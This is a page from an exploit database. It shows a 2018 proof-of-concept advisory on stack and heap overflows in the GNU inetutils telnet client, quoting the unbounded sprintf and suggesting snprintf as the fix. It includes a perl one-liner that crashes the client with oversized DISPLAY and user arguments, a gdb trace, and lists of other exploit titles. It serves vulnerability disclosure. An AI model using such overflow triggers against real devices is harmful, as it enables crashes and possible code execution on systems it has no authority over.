Menu

Search for hundreds of thousands of exploits

"GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)"

Author

Exploit author

"Hacker Fantastic"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-12-11

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
GNU inetutils <= 1.9.4 telnet.c multiple overflows
==================================================
GNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment 
variable handling which can be exploited to escape restricted shells on embedded devices. 
Most modern browsers no longer support telnet:// handlers, but in instances where URI
handlers are enabled to the inetutils telnet client this issue maybe remotely triggerable. 
A stack-based overflow is present in the handling of environment variables when connecting 
telnet.c to remote telnet servers through oversized DISPLAY arguments.

A heap-overflow is also present which can be triggered in a different code path due to 
supplying oversized environment variables during client connection code. 

The stack-based overflow can be seen in the following code snippet from the latest inetutils 
release dated 2015.

inetutils-telnet/inetutils-1.9.4/telnet/telnet.c

983-    case TELOPT_XDISPLOC:
984-      if (my_want_state_is_wont (TELOPT_XDISPLOC))
985-	return;
986-      if (SB_EOF ())
987-	return;
988-      if (SB_GET () == TELQUAL_SEND)
989-	{
990-	  unsigned char temp[50], *dp;
991-	  int len;
992-
993-	  if ((dp = env_getvalue ("DISPLAY")) == NULL)
994-	    {
995-	      /*
996-	       * Something happened, we no longer have a DISPLAY
997-	       * variable.  So, turn off the option.
998-	       */
999-	      send_wont (TELOPT_XDISPLOC, 1);
1000-	      break;
1001-	    }
1002:	  sprintf ((char *) temp, "%c%c%c%c%s%c%c", IAC, SB, TELOPT_XDISPLOC,
1003-		   TELQUAL_IS, dp, IAC, SE);
1004-	  len = strlen ((char *) temp + 4) + 4;	/* temp[3] is 0 ... */
1005-
1006-	  if (len < NETROOM ())

When a telnet server requests environment options the sprintf on line 1002 will
not perform bounds checking and causes an overflow of stack buffer temp[50] defined
at line 990. This issue can be trivially fixed using a patch to add bounds checking
to sprintf such as with a call to snprintf();  

An example of the heap overflow can be seen when handling large environment
variables within the telnet client, causing heap buffer memory corruption
through long string supplied in example USER or DISPLAY.

An example of triggering this issue on inetutils in Arch Linux can be seen below:

DISPLAY=`perl -e 'print Ax"50000"'` telnet -l`perl -e 'print "A"x5000'` 192.168.69.1
Trying 192.168.69.1...
Connected to 192.168.69.1.
Escape character is '^]'.
realloc(): invalid next size
Aborted (core dumped)

These issues are present anywhere that inetutils is used as a base for clients
such as in common embedded home routers or networking equipment. An attacker
can potentially exploit these vulnerabilities to gain arbitrary code execution
on platforms where telnet commands are available. An example debug trace of the
heap overflow can be found below:

(gdb) run -l`perl -e 'print "A"x5000'` 192.168.69.1
Starting program: /usr/bin/telnet -l`perl -e 'print "A"x5000'` 192.168.69.1
Trying 192.168.69.1...
Connected to 192.168.69.1.
Escape character is '^]'.
realloc(): invalid next size

Program received signal SIGABRT, Aborted.
0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6
#1  0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6
#2  0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6
#3  0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6
#4  0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6
#5  0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6
#6  0x000055555556029c in ?? ()
#7  0x0000555555560116 in ?? ()
#8  0x000055555556049f in ?? ()
#9  0x00005555555606b7 in ?? ()
#10 0x00005555555616de in ?? ()
#11 0x0000555555561b8d in ?? ()
#12 0x0000555555562122 in ?? ()
#13 0x000055555555c6f4 in ?? ()
#14 0x00005555555591e7 in ?? ()
#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6
#16 0x00005555555592be in ?? ()

Due to the various devices embedding telnet from inetutils and distributions
such as Arch Linux using inetutils telnet, it is unclear the full impact and all
scenarios where this issue could be leveraged. An attacker may seek to exploit
these vulnerabilities to escape restricted shells.

-- Hacker Fantastic (11/12/2018)

https://hacker.house
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2018-12-11 "GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)" dos linux "Hacker Fantastic"
2018-10-25 "xorg-x11-server < 1.20.3 - Local Privilege Escalation" local multiple "Hacker Fantastic"
2017-04-13 "GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation" local osx "Hacker Fantastic"
2017-04-12 "Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation" local solaris "Hacker Fantastic"
2017-04-02 "PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation" local linux "Hacker Fantastic"
2017-02-15 "Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses" webapps php "Hacker Fantastic"
2016-12-18 "RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection" local linux "Hacker Fantastic"
2016-12-18 "Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution" local linux "Hacker Fantastic"
2016-10-21 "TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection" remote hardware "Hacker Fantastic"
2016-03-09 "Exim 4.84-3 - Local Privilege Escalation" local linux "Hacker Fantastic"
2016-01-15 "Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation" local linux "Hacker Fantastic"
2016-01-11 "Amanda 3.3.1 - Local Privilege Escalation" local linux "Hacker Fantastic"
2015-06-02 "PonyOS 3.0 - TTY 'ioctl()' Local Kernel" local linux "Hacker Fantastic"
2015-06-01 "PonyOS 3.0 - VFS Permissions" local linux "Hacker Fantastic"
2015-06-01 "PonyOS 3.0 - ELF Loader Privilege Escalation" local linux "Hacker Fantastic" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected